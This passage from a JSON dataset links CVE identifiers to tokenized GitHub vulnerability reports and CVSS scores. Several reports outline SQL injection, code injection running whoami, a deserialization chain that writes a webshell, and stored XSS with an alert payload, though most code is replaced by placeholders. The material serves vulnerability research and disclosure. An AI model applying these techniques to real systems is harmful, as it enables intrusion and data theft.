  82621. "Repo_new": "tensorflow/tensorflow",
  82622. "Issue_Created_At": "2020-12-17T00:40:20Z",
  82623. "description": "Segmentation fault in tf.histogram_fixed_width. APITAG make sure that this is a bug. As per our FILETAG , we only address code/doc bugs, performance issues, feature requests and build/installation issues on APITAG tag:bug_template APITAG System information Have I written custom code (as opposed to using a stock example script provided in APITAG No OS Platform and Distribution (e.g., Linux Ubuntu NUMBERTAG Linux Ubuntu NUMBERTAG Mobile device (e.g. APITAG NUMBERTAG Pixel NUMBERTAG Samsung Galaxy) if the issue happens on mobile device: N/A APITAG installed from (source or binary): binary APITAG version (use command below NUMBERTAG Python version NUMBERTAG Bazel version (if compiling from source):N/A APITAG version (if compiling from source):N/A APITAG version:N/A GPU model and memory:N/A Describe the current behavior APITAG crashes (segmentation fault) when values contain nan Describe the expected behavior Expect no crash Standalone code to reproduce the issue ~~~python import tensorflow as tf import numpy as np APITAG value_range NUMBERTAG",
  82624. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  82625. "severity": "MEDIUM",
  82626. "baseScore": 5.5,
  82627. "impactScore": 3.6,
  82628. "exploitabilityScore": 1.8
  82629. },
  82630. {
  82631. "CVE_ID": "CVE-2022-29212",
  82632. "Issue_Url_old": "https://github.com/tensorflow/tensorflow/issues/43661",
  82633. "Issue_Url_new": "https://github.com/tensorflow/tensorflow/issues/43661",
  82634. "Repo_new": "tensorflow/tensorflow",
  82635. "Issue_Created_At": "2020-09-30T01:56:21Z",
  82636. "description": "Core dumped when invoking APITAG model converted using latest nightly APITAG converter NUMBERTAG de NUMBERTAG System information OS Platform and Distribution (e.g., Linux Ubuntu NUMBERTAG Linux Ubuntu NUMBERTAG APITAG installed from (source or binary): binary APITAG version (or github SHA if from source NUMBERTAG de NUMBERTAG Command used to run the converter or code if you\u2019re using the Python API ERRORTAG Link to Google Colab Notebook APITAG The output from the converter invocation ERRORTAG Also, please include a link to the saved model or APITAG APITAG Failure details The conversion is successful in that it generates a tflite graph. However, when I invoke the graph, I get a core dump error NUMBERTAG abort (core dumped) python APITAG Any other info / logs CODETAG Include any logs or source code that would be helpful to diagnose the problem. If including tracebacks, please include the full traceback. Large logs and files should be attached. Traceback ERRORTAG",
  82637. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  82638. "severity": "MEDIUM",
  82639. "baseScore": 5.5,
  82640. "impactScore": 3.6,
  82641. "exploitabilityScore": 1.8
  82642. },
  82643. {
  82644. "CVE_ID": "CVE-2022-29213",
  82645. "Issue_Url_old": "https://github.com/tensorflow/tensorflow/issues/55263",
  82646. "Issue_Url_new": "https://github.com/tensorflow/tensorflow/issues/55263",
  82647. "Repo_new": "tensorflow/tensorflow",
  82648. "Issue_Created_At": "2022-03-17T05:41:45Z",
  82649. "description": "APITAG and APITAG lacks input validation leading to crashes. System information Have I written custom code (as opposed to using a stock example script provided in APITAG Yes OS Platform and Distribution (e.g., Linux Ubuntu NUMBERTAG N/A Mobile device (e.g. APITAG NUMBERTAG Pixel NUMBERTAG Samsung Galaxy) if the issue happens on mobile device: APITAG installed from (source or binary): binary APITAG version (use command below NUMBERTAG Python APITAG Bazel version (if compiling from source): APITAG version (if compiling from source): APITAG version NUMBERTAG based on a colab notebook) GPU model and memory: Tesla T4, APITAG (based on a colab notebook) Describe the current behavior The following code snippets lead to crashes when executed: CODETAG and CODETAG In either case, the inputs do not quite make sense, and tensorflow should throw. Describe the expected behavior Tensorflow should throw exceptions instead of crashing. Contributing URLTAG Do you want to contribute a PR? (yes/no): Briefly describe your candidate solution(if contributing): Standalone code to reproduce the issue Here is a colab notebook: URLTAG The code snippets above should also reproduce the issue.",
  82650. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  82651. "severity": "MEDIUM",
  82652. "baseScore": 5.5,
  82653. "impactScore": 3.6,
  82654. "exploitabilityScore": 1.8
  82655. },
  82656. {
  82657. "CVE_ID": "CVE-2022-29305",
  82658. "Issue_Url_old": "https://github.com/helloxz/imgurl/issues/75",
  82659. "Issue_Url_new": "https://github.com/helloxz/imgurl/issues/75",
  82660. "Repo_new": "helloxz/imgurl",
  82661. "Issue_Created_At": "2022-04-11T09:19:12Z",
  82662. "description": "Blind SQL Injection Vulnerability . Description \uff08\u6f0f\u6d1e\u63cf\u8ff0\uff09 imgurl NUMBERTAG Multiple ways are used to obtain user ip \uff08\u4f7f\u7528\u4e86\u591a\u79cd\u65b9\u6cd5\u83b7\u53d6\u7528\u6237ip\uff09 FILETAG Then splice the user ip directly into the sql statement in lines NUMBERTAG to NUMBERTAG of APITAG FILETAG query >uplimit($ip) FILETAG Proof of Concept ERRORTAG FILETAG FILETAG Command for injection using sqlmap ERRORTAG FILETAG Repair method \uff08\u4fee\u590d\u65b9\u6cd5\uff09 Check user ip format or use PDO to prevent sql injection \uff08\u68c0\u67e5\u7528\u6237ip\u683c\u5f0f\u6216\u4f7f\u7528PDO\u6765\u9632\u6b62sql\u6ce8\u5165\uff09",
  82663. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  82664. "severity": "HIGH",
  82665. "baseScore": 8.1,
  82666. "impactScore": 5.9,
  82667. "exploitabilityScore": 2.2
  82668. },
  82669. {
  82670. "CVE_ID": "CVE-2022-29306",
  82671. "Issue_Url_old": "https://github.com/ionize/ionize/issues/404",
  82672. "Issue_Url_new": "https://github.com/ionize/ionize/issues/404",
  82673. "Repo_new": "ionize/ionize",
  82674. "Issue_Created_At": "2022-04-11T09:26:21Z",
  82675. "description": "APITAG NUMBERTAG Unverified post request parameters lead to sql injection. APITAG Exploit Title: APITAG NUMBERTAG Unverified post request parameters lead to sql injection Exploit date NUMBERTAG Exploit Author: EMAILTAG Vendor Homepage: URLTAG Affect Version NUMBERTAG Description: SQL injection in Ionize CMS NUMBERTAG allows attackers to execute commands remotely via a sql injection request from client. APITAG to Exploit Construct normal packet and send. In the image below, you can see that there is a NUMBERTAG second network delay. APITAG Construct the injected data to execute APITAG . It can be found that the delay is more than NUMBERTAG seconds. It is speculated that there are NUMBERTAG records in total, so APITAG is executed NUMBERTAG times. APITAG Construct the injection again to execute APITAG , this time with a delay of APITAG seconds if the guess is correct. APITAG APITAG Validate the parameters in the post request to avoid SQL injection",
  82676. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  82677. "severity": "CRITICAL",
  82678. "baseScore": 9.8,
  82679. "impactScore": 5.9,
  82680. "exploitabilityScore": 3.9
  82681. },
  82682. {
  82683. "CVE_ID": "CVE-2022-29307",
  82684. "Issue_Url_old": "https://github.com/ionize/ionize/issues/405",
  82685. "Issue_Url_new": "https://github.com/ionize/ionize/issues/405",
  82686. "Repo_new": "ionize/ionize",
  82687. "Issue_Created_At": "2022-04-11T09:45:52Z",
  82688. "description": "APITAG NUMBERTAG Unverified post request parameters lead to code injection. APITAG Exploit Title: APITAG NUMBERTAG Unverified post request parameters lead to code injection Exploit date NUMBERTAG Exploit Author: EMAILTAG Vendor Homepage: URLTAG Affect Version NUMBERTAG Description: Code injection in Ionize CMS NUMBERTAG allows attackers to execute commands remotely via a code injection request from client. APITAG Description The exploit code is located in the project's PATHTAG file In the copy_lang_content method, the code is as follows. The POST parameter from is spliced into the function content parameter in the ERRORTAG function without any processing or checking, resulting in a code injection vulnerability APITAG APITAG to Exploit Construct the attack packet to achieve the effect of executing the whoami command. APITAG APITAG Validate the parameters in the post request to avoid Code injection",
  82689. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  82690. "severity": "CRITICAL",
  82691. "baseScore": 9.8,
  82692. "impactScore": 5.9,
  82693. "exploitabilityScore": 3.9
  82694. },
  82695. {
  82696. "CVE_ID": "CVE-2022-29309",
  82697. "Issue_Url_old": "https://github.com/wangl1989/mysiteforme/issues/43",
  82698. "Issue_Url_new": "https://github.com/wangl1989/mysiteforme/issues/43",
  82699. "Repo_new": "wangl1989/mysiteforme",
  82700. "Issue_Created_At": "2022-04-06T12:00:25Z",
  82701. "description": "An SSRF vulnerability exists in the system. The problem code Controllable URL parameters FILETAG Vulnerability validation FILETAG The DNS platform received the request. Procedure FILETAG",
  82702. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  82703. "severity": "HIGH",
  82704. "baseScore": 7.5,
  82705. "impactScore": 3.6,
  82706. "exploitabilityScore": 3.9
  82707. },
  82708. {
  82709. "CVE_ID": "CVE-2022-29334",
  82710. "Issue_Url_old": "https://github.com/SiJiDo/H/issues/27",
  82711. "Issue_Url_new": "https://github.com/sijido/h/issues/27",
  82712. "Repo_new": "sijido/h",
  82713. "Issue_Created_At": "2022-04-11T05:03:53Z",
  82714. "description": "\u56fa\u5b9a\u7684cookie NUMBERTAG APITAG FILETAG NUMBERTAG H\u7cfb\u7edf\u7684target_ip\uff0c\u8bbf\u95ee URLTAG \uff0c\u7ed3\u679c\u5982\u56fe\uff1a FILETAG NUMBERTAG burpsuite\u62e6\u622a URLTAG APITAG FILETAG \u54cd\u5e94\u754c\u9762\u5982\u4e0b\u6240\u793a\uff08\u5373\u53ef\u6210\u529f\u767b\u5f55\uff09 FILETAG",
  82715. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  82716. "severity": "CRITICAL",
  82717. "baseScore": 9.8,
  82718. "impactScore": 5.9,
  82719. "exploitabilityScore": 3.9
  82720. },
  82721. {
  82722. "CVE_ID": "CVE-2022-29339",
  82723. "Issue_Url_old": "https://github.com/gpac/gpac/issues/2165",
  82724. "Issue_Url_new": "https://github.com/gpac/gpac/issues/2165",
  82725. "Repo_new": "gpac/gpac",
  82726. "Issue_Created_At": "2022-04-08T08:28:19Z",
  82727. "description": "Assertion failed in APITAG APITAG version info: ERRORTAG poc: poc URLTAG command: APITAG hint out /dev/null $poc$ crash: ERRORTAG",
  82728. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  82729. "severity": "HIGH",
  82730. "baseScore": 7.5,
  82731. "impactScore": 3.6,
  82732. "exploitabilityScore": 3.9
  82733. },
  82734. {
  82735. "CVE_ID": "CVE-2022-29340",
  82736. "Issue_Url_old": "https://github.com/gpac/gpac/issues/2163",
  82737. "Issue_Url_new": "https://github.com/gpac/gpac/issues/2163",
  82738. "Repo_new": "gpac/gpac",
  82739. "Issue_Created_At": "2022-04-01T12:17:54Z",
  82740. "description": "NULL Pointer Dereference still exists in APITAG version info: ERRORTAG poc: poc URLTAG command: APITAG hint out /dev/null $poc$ crash: ERRORTAG When APITAG and APITAG , APITAG will return APITAG (i.e NUMBERTAG at line NUMBERTAG of box_funcs.c. URLTAG This will cause APITAG to be set to NULL (in APITAG and the return value APITAG will be passed to the upper function ( in APITAG URLTAG The program now executes the empty if block when APITAG ( in APITAG NUMBERTAG and later dereferences the null pointer in line NUMBERTAG of isom_intern.c. URLTAG Note that although the crash path is the same as in issue NUMBERTAG their root cause is different.",
  82741. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  82742. "severity": "HIGH",
  82743. "baseScore": 7.5,
  82744. "impactScore": 3.6,
  82745. "exploitabilityScore": 3.9
  82746. },
  82747. {
  82748. "CVE_ID": "CVE-2022-29349",
  82749. "Issue_Url_old": "https://github.com/kekingcn/kkFileView/issues/347",
  82750. "Issue_Url_new": "https://github.com/kekingcn/kkfileview/issues/347",
  82751. "Repo_new": "kekingcn/kkfileview",
  82752. "Issue_Created_At": "2022-04-13T08:37:22Z",
  82753. "description": "XSS Vulnerability. APITAG XSS Vulnerability APITAG APITAG APITAG APITAG NUMBERTAG has an XSS vulnerability, which may lead to the leakage of website cookies. \u6f0f\u6d1e\u4f4d\u7f6evulerable code location APITAG APITAG The vulnerability code is located at line NUMBERTAG in APITAG , The url parameter is user controllable, and it is output to the page without filtering special characters ERRORTAG APITAG APITAG URLTAG The version of official demo site is NUMBERTAG isit URLTAG and the concept is proofed. APITAG url parameter value needs to be base NUMBERTAG encoded and url encoded.)",
  82754. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  82755. "severity": "MEDIUM",
  82756. "baseScore": 6.1,
  82757. "impactScore": 2.7,
  82758. "exploitabilityScore": 2.8
  82759. },
  82760. {
  82761. "CVE_ID": "CVE-2022-29361",
  82762. "Issue_Url_old": "https://github.com/pallets/werkzeug/issues/2420",
  82763. "Issue_Url_new": "https://github.com/pallets/werkzeug/issues/2420",
  82764. "Repo_new": "pallets/werkzeug",
  82765. "Issue_Created_At": "2022-05-25T14:07:43Z",
  82766. "description": "Question regarding CVETAG . I have a question regarding the HTTP request smuggling vulnerability CVETAG CVETAG in werkzeug. The resources provided at mitre seem not to be pointing to a fix. I tried to find a fix but was unsuccessful. Would it be possible for you to link to a fixing commit or provide a security advisory here? Thanks a lot!",
  82767. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  82768. "severity": "CRITICAL",
  82769. "baseScore": 9.8,
  82770. "impactScore": 5.9,
  82771. "exploitabilityScore": 3.9
  82772. },
  82773. {
  82774. "CVE_ID": "CVE-2022-29363",
  82775. "Issue_Url_old": "https://github.com/qinggan/phpok/issues/12",
  82776. "Issue_Url_new": "https://github.com/qinggan/phpok/issues/12",
  82777. "Repo_new": "qinggan/phpok",
  82778. "Issue_Created_At": "2022-04-14T07:37:26Z",
  82779. "description": "phpok NUMBERTAG has a deserialization vulnerability, and can getshell by writing arbitrary files . The update method in the login controller of the admin module calls the decode method and calls unserialize in the decode function poc: APITAG analyze\uff1a APITAG APITAG For this payload, we can use the cache class, whose __destruct method calls the save method, and the save method can write to the webshell\uff1a APITAG The exit here can be bypassed through the pseudo protocol of php\uff1a APITAG php file successfully written and executed\uff1a APITAG When executing the following file to generate an attack chain, put FILETAG in the same directory: ERRORTAG",
  82780. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  82781. "severity": "CRITICAL",
  82782. "baseScore": 9.8,
  82783. "impactScore": 5.9,
  82784. "exploitabilityScore": 3.9
  82785. },
  82786. {
  82787. "CVE_ID": "CVE-2022-29368",
  82788. "Issue_Url_old": "https://github.com/Moddable-OpenSource/moddable/issues/896",
  82789. "Issue_Url_new": "https://github.com/moddable-opensource/moddable/issues/896",
  82790. "Repo_new": "moddable-opensource/moddable",
  82791. "Issue_Created_At": "2022-04-08T06:18:36Z",
  82792. "description": "Out of bounds Read in APITAG Environment Build environment: Linux ubuntu NUMBERTAG generic APITAG Ubuntu SMP Fri Jan NUMBERTAG UTC NUMBERTAG APITAG Target device: sdk Commit: APITAG Proof of concept FILETAG ERRORTAG Analysis In file: PATHTAG CODETAG Since the offset in NUMBERTAG is controlled by attackers, this issue brings arbitrary memory read primitive. ERRORTAG In this case, rax is an out of bounds read index of the APITAG , which has the value value of APITAG . ASAN Stack dump ERRORTAG Credit P1umer( APITAG and Q1IQ( APITAG",
  82793. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
  82794. "severity": "HIGH",
  82795. "baseScore": 7.1,
  82796. "impactScore": 5.2,
  82797. "exploitabilityScore": 1.8
  82798. },
  82799. {
  82800. "CVE_ID": "CVE-2022-29369",
  82801. "Issue_Url_old": "https://github.com/nginx/njs/issues/467",
  82802. "Issue_Url_new": "https://github.com/nginx/njs/issues/467",
  82803. "Repo_new": "nginx/njs",
  82804. "Issue_Created_At": "2022-02-15T08:25:51Z",
  82805. "description": "SEGV APITAG in njs_lvlhsh_bucket_find. Environment CODETAG Proof of concept ERRORTAG Stack dump ERRORTAG Credit Q1IQ( APITAG",
  82806. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  82807. "severity": "HIGH",
  82808. "baseScore": 7.5,
  82809. "impactScore": 3.6,
  82810. "exploitabilityScore": 3.9
  82811. },
  82812. {
  82813. "CVE_ID": "CVE-2022-29379",
  82814. "Issue_Url_old": "https://github.com/nginx/njs/issues/493",
  82815. "Issue_Url_new": "https://github.com/nginx/njs/issues/493",
  82816. "Repo_new": "nginx/njs",
  82817. "Issue_Created_At": "2022-04-13T01:20:16Z",
  82818. "description": "APITAG njs NUMBERTAG was discovered to contain a stack buffer overflow bug in njs_default_module_loader. Description njs NUMBERTAG used in NGINX, was discovered to contain a stack buffer overflow in njs_default_module_loader ( PATHTAG ) ENV Version NUMBERTAG Commit : APITAG OS : Ubuntu NUMBERTAG Configure : CC=clang NUMBERTAG configure address sanitizer=YES BT ERRORTAG Fixed The issue was fixed in URLTAG FYI, the problem was committed in URLTAG which was not released yet.",
  82819. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  82820. "severity": "CRITICAL",
  82821. "baseScore": 9.8,
  82822. "impactScore": 5.9,
  82823. "exploitabilityScore": 3.9
  82824. },
  82825. {
  82826. "CVE_ID": "CVE-2022-29379",
  82827. "Issue_Url_old": "https://github.com/nginx/njs/issues/491",
  82828. "Issue_Url_new": "https://github.com/nginx/njs/issues/491",
  82829. "Repo_new": "nginx/njs",
  82830. "Issue_Created_At": "2022-04-08T08:53:47Z",
  82831. "description": "Found a possible security concern. Hey there! I belong to an open source security research community, and a member ( APITAG has found an issue, but doesn\u2019t know the best way to disclose it. If not a hassle, might you kindly add a APITAG file with an email, or another contact method? APITAG recommends URLTAG this best practice to ensure security issues are responsibly disclosed, and it would serve as a simple instruction for security researchers in the future. Thank you for your consideration, and I look forward to hearing from you! (cc APITAG helper)",
  82832. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  82833. "severity": "CRITICAL",
  82834. "baseScore": 9.8,
  82835. "impactScore": 5.9,
  82836. "exploitabilityScore": 3.9
  82837. },
  82838. {
  82839. "CVE_ID": "CVE-2022-29498",
  82840. "Issue_Url_old": "https://github.com/ankane/blazer/issues/392",
  82841. "Issue_Url_new": "https://github.com/ankane/blazer/issues/392",
  82842. "Repo_new": "ankane/blazer",
  82843. "Issue_Created_At": "2022-04-20T21:38:03Z",
  82844. "description": "SQL injection for certain queries with variables. Blazer queries with variables are vulnerable to SQL injection in certain cases. This vulnerability has been assigned the CVE identifier CVETAG . Versions Affected NUMBERTAG and below Fixed Versions NUMBERTAG Impact For some queries, specific variable values can modify the query rather than just the variable. This can occur if NUMBERTAG the query's data source uses different escaping than the Rails database OR NUMBERTAG the query has a variable inside a string literal Since Blazer is designed to run arbitrary queries, the impact will typically be low. Users cannot run any queries they could not have already run. However, an attacker could get a user to run a query they would not have normally run. If the data source has write permissions, this could include modifying data in some cases. Mitigation All users running an affected release should upgrade when possible. Blazer now uses parameterized queries or prepared statements for variables for a number of data sources, which mitigates the issue for their queries. Escaping has been fixed for the other data sources, but it's still possible for users to write queries that can't be escaped correctly, like APITAG . For this reason, data sources should use credentials with read only permissions. Credit Thanks to Al Chou for reporting the escaping issue.",
  82845. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  82846. "severity": "HIGH",
  82847. "baseScore": 7.5,
  82848. "impactScore": 3.6,
  82849. "exploitabilityScore": 3.9
  82850. },
  82851. {
  82852. "CVE_ID": "CVE-2022-29526",
  82853. "Issue_Url_old": "https://github.com/golang/go/issues/52313",
  82854. "Issue_Url_new": "https://github.com/golang/go/issues/52313",
  82855. "Repo_new": "golang/go",
  82856. "Issue_Created_At": "2022-04-12T20:16:17Z",
  82857. "description": "syscall: Faccessat checks wrong group. The APITAG function checks whether the calling process can access a file. Faccessat contains a bug where it checks a file's group permission bits if the process's user is a member of the process's group rather than a member of the file's group. URLTAG CODETAG Since a process's user is usually a member of the process's group, this causes Faccessat to usually check a file's group permissions even if the process's user is not a member of the file's group. Thanks to MENTIONTAG for reporting this.",
  82858. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  82859. "severity": "MEDIUM",
  82860. "baseScore": 5.3,
  82861. "impactScore": 1.4,
  82862. "exploitabilityScore": 3.9
  82863. },
  82864. {
  82865. "CVE_ID": "CVE-2022-29537",
  82866. "Issue_Url_old": "https://github.com/gpac/gpac/issues/2173",
  82867. "Issue_Url_new": "https://github.com/gpac/gpac/issues/2173",
  82868. "Repo_new": "gpac/gpac",
  82869. "Issue_Created_At": "2022-04-16T08:01:38Z",
  82870. "description": "FILETAG POC FILETAG",
  82871. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  82872. "severity": "MEDIUM",
  82873. "baseScore": 5.5,
  82874. "impactScore": 3.6,
  82875. "exploitabilityScore": 1.8
  82876. },
  82877. {
  82878. "CVE_ID": "CVE-2022-29583",
  82879. "Issue_Url_old": "https://github.com/kardianos/service/issues/289",
  82880. "Issue_Url_new": "https://github.com/kardianos/service/issues/289",
  82881. "Repo_new": "kardianos/service",
  82882. "Issue_Created_At": "2021-08-04T08:33:58Z",
  82883. "description": "Windows service: unquoted service path can allow for privilege escalation. Hello! We use Telegraf URLTAG (which depend on this library) and our vulnerability scanner notifies us of the following vulnerability with the telegraf service: Windows Unquoted Search Path or Element can allow local privilege escalation URLTAG I did some brief digging around and I think the problem boils down to this line: URLTAG Here you take the path to the executing program (if I understood correctly) and later use it when you install the service. Doing this without adding quotes to the path means that the unquoted service path issue comes into effect. You should be able to simply add quotes to the path, and in doing to solve the issue at hand.",
  82884. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  82885. "severity": "HIGH",
  82886. "baseScore": 7.8,
  82887. "impactScore": 5.9,
  82888. "exploitabilityScore": 1.8
  82889. },
  82890. {
  82891. "CVE_ID": "CVE-2022-29622",
  82892. "Issue_Url_old": "https://github.com/node-formidable/formidable/issues/856",
  82893. "Issue_Url_new": "https://github.com/node-formidable/formidable/issues/856",
  82894. "Repo_new": "node-formidable/formidable",
  82895. "Issue_Created_At": "2022-05-19T05:55:03Z",
  82896. "description": "Vulnerability CVETAG is reported by Whitesource. URLTAG",
  82897. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  82898. "severity": "CRITICAL",
  82899. "baseScore": 9.8,
  82900. "impactScore": 5.9,
  82901. "exploitabilityScore": 3.9
  82902. },
  82903. {
  82904. "CVE_ID": "CVE-2022-29622",
  82905. "Issue_Url_old": "https://github.com/node-formidable/formidable/issues/862",
  82906. "Issue_Url_new": "https://github.com/node-formidable/formidable/issues/862",
  82907. "Repo_new": "node-formidable/formidable",
  82908. "Issue_Created_At": "2022-05-27T14:51:41Z",
  82909. "description": "Filename filtering is inappropriate. I came across your filename handling and filtering with the CVETAG and this issue URLTAG First you got blamed also inappropriate by this CVETAG whoever is responsible for publishing this without correct approval. Filenames of forms can have html tags and js like text, like any other form inputs and it is the responsibility of the lib user to handle this, because only he/she knows where this filename is used and what is a safety risc. All this filtering and replacement makes it worse, because the original filename of upload gets lost. Why I've opened this issue: Now your current code of __formidable__ has some filename filtering which is __dysfunctional__. This is an example you can put in e.g. URLTAG The code is from your current master FILETAG and I've added some asserts to show the problem. ERRORTAG",
  82910. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  82911. "severity": "CRITICAL",
  82912. "baseScore": 9.8,
  82913. "impactScore": 5.9,
  82914. "exploitabilityScore": 3.9
  82915. },
  82916. {
  82917. "CVE_ID": "CVE-2022-29631",
  82918. "Issue_Url_old": "https://github.com/oblac/jodd-http/issues/9",
  82919. "Issue_Url_new": "https://github.com/oblac/jodd-http/issues/9",
  82920. "Repo_new": "oblac/jodd-http",
  82921. "Issue_Created_At": "2022-04-17T16:59:28Z",
  82922. "description": "CRLF injection vulnerability in jodd http. CRLF injection vulnerability in jodd http CRLF injection vulnerability in APITAG and APITAG in APITAG version NUMBERTAG all versions so far ) , allows remote attackers to inject arbitrary TCP payload via CRLF sequences in a URL . Proof of concept \uff1a CODETAG CODETAG run the poc , listen on APITAG FILETAG details \uff1a in APITAG when processing path \uff0c APITAG is called \uff0cand it is allowed to inject APITAG in query string and path and fragment . in APITAG , APITAG is called , and trying to build the http request payload . However , the path , query string , frament and othor components are just appended insecurely , which leads to the crlf injection . suggestion : it is recommended to urlencode the invalid characters when constructing the http request payload .",
  82923. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  82924. "severity": "HIGH",
  82925. "baseScore": 7.5,
  82926. "impactScore": 3.6,
  82927. "exploitabilityScore": 3.9
  82928. },
  82929. {
  82930. "CVE_ID": "CVE-2022-29632",
  82931. "Issue_Url_old": "https://github.com/roncoo/roncoo-education/issues/16",
  82932. "Issue_Url_new": "https://github.com/roncoo/roncoo-education/issues/16",
  82933. "Repo_new": "roncoo/roncoo-education",
  82934. "Issue_Created_At": "2022-04-18T03:18:50Z",
  82935. "description": "There is a File upload vulnerability exists in roncoo education. APITAG description] File upload vulnerability in roncoo education. Because the identity is not authenticated in the uploadpic upload method of apiuploadcontroller, and the user is allowed to define the file suffix. APITAG Type] File upload vulnerability APITAG of Product] URLTAG APITAG Product Code Base NUMBERTAG RELEASE APITAG Component] ERRORTAG APITAG proof] Use the following HTML file to initiate the upload request CODETAG Upload any file, here my file source code is CODETAG The server returns the following data APITAG APITAG APITAG code] APITAG APITAG",
  82936. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  82937. "severity": "CRITICAL",
  82938. "baseScore": 9.8,
  82939. "impactScore": 5.9,
  82940. "exploitabilityScore": 3.9
  82941. },
  82942. {
  82943. "CVE_ID": "CVE-2022-29637",
  82944. "Issue_Url_old": "https://github.com/mindoc-org/mindoc/issues/788",
  82945. "Issue_Url_new": "https://github.com/mindoc-org/mindoc/issues/788",
  82946. "Repo_new": "mindoc-org/mindoc",
  82947. "Issue_Created_At": "2022-04-24T13:42:02Z",
  82948. "description": "There is a directory traversal vulnerability in mindoc. \u8bf7\u6309\u7167\u4e00\u4e0b\u683c\u5f0f\u63d0\u4ea4issue NUMBERTAG APITAG APITAG NUMBERTAG beta NUMBERTAG Centos NUMBERTAG zip NUMBERTAG FILETAG NUMBERTAG APITAG FILETAG APITAG After clicking upload, he will create a new APITAG in the root directory of the server APITAG APITAG code] APITAG APITAG APITAG Bingan",
  82949. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  82950. "severity": "HIGH",
  82951. "baseScore": 7.8,
  82952. "impactScore": 5.9,
  82953. "exploitabilityScore": 1.8
  82954. },
  82955. {
  82956. "CVE_ID": "CVE-2022-29648",
  82957. "Issue_Url_old": "https://github.com/jflyfox/jfinal_cms/issues/34",
  82958. "Issue_Url_new": "https://github.com/jflyfox/jfinal_cms/issues/34",
  82959. "Repo_new": "jflyfox/jfinal_cms",
  82960. "Issue_Created_At": "2022-04-14T02:59:27Z",
  82961. "description": "There is an xss vulnerability of HTTP header injection storage in jfinal_cms NUMBERTAG FILETAG The contents of the grab bag are as follows: FILETAG Add an X Forwarded For here and enter paylaod ( APITAG APITAG alert (\"xss\") APITAG ) FILETAG Then log in with the background administrator account to trigger the storage XSS. FILETAG Safety advice: Strictly filter the user's input Strict control of page rendering content",
  82962. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  82963. "severity": "MEDIUM",
  82964. "baseScore": 5.4,
  82965. "impactScore": 2.7,
  82966. "exploitabilityScore": 2.3
  82967. },
  82968. {
  82969. "CVE_ID": "CVE-2022-29660",
  82970. "Issue_Url_old": "https://github.com/chshcms/cscms/issues/25",
  82971. "Issue_Url_new": "https://github.com/chshcms/cscms/issues/25",
  82972. "Repo_new": "chshcms/cscms",
  82973. "Issue_Created_At": "2022-04-19T02:48:07Z",
  82974. "description": "SQL injection vulnerability exists in Cscms music portal system NUMBERTAG Details There is a Injection vulnerability exists in APITAG First create an image and then delete it. When deleting an image, SQL injection is generated. The injection point is ID CODETAG The injection point is ID and sleeps for NUMBERTAG seconds FILETAG Then construct payload to blast database FILETAG FILETAG Because the first letter of the background database name is \"c\", it sleeps for NUMBERTAG seconds,so the vulnerablity exisit",
  82975. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  82976. "severity": "CRITICAL",
  82977. "baseScore": 9.8,
  82978. "impactScore": 5.9,
  82979. "exploitabilityScore": 3.9
  82980. },
  82981. {
  82982. "CVE_ID": "CVE-2022-29661",
  82983. "Issue_Url_old": "https://github.com/chshcms/cscms/issues/21",
  82984. "Issue_Url_new": "https://github.com/chshcms/cscms/issues/21",
  82985. "Repo_new": "chshcms/cscms",
  82986. "Issue_Created_At": "2022-04-19T02:28:00Z",
  82987. "description": "SQL injection vulnerability exists in Cscms music portal system NUMBERTAG Details There is a SQL blind injection vulnerability in APITAG Add an album after the administrator logs in FILETAG CODETAG FILETAG Delete this album to the recycle bin FILETAG When deleting the album in the recycle bin, construct malicious statements to realize SQL injection CODETAG The payload executes and sleeps for NUMBERTAG seconds FILETAG so construct payload to Blasting database FILETAG FILETAG Because the first letter of the background database name is \"c\", it sleeps for NUMBERTAG seconds,so the vulnerability exist",
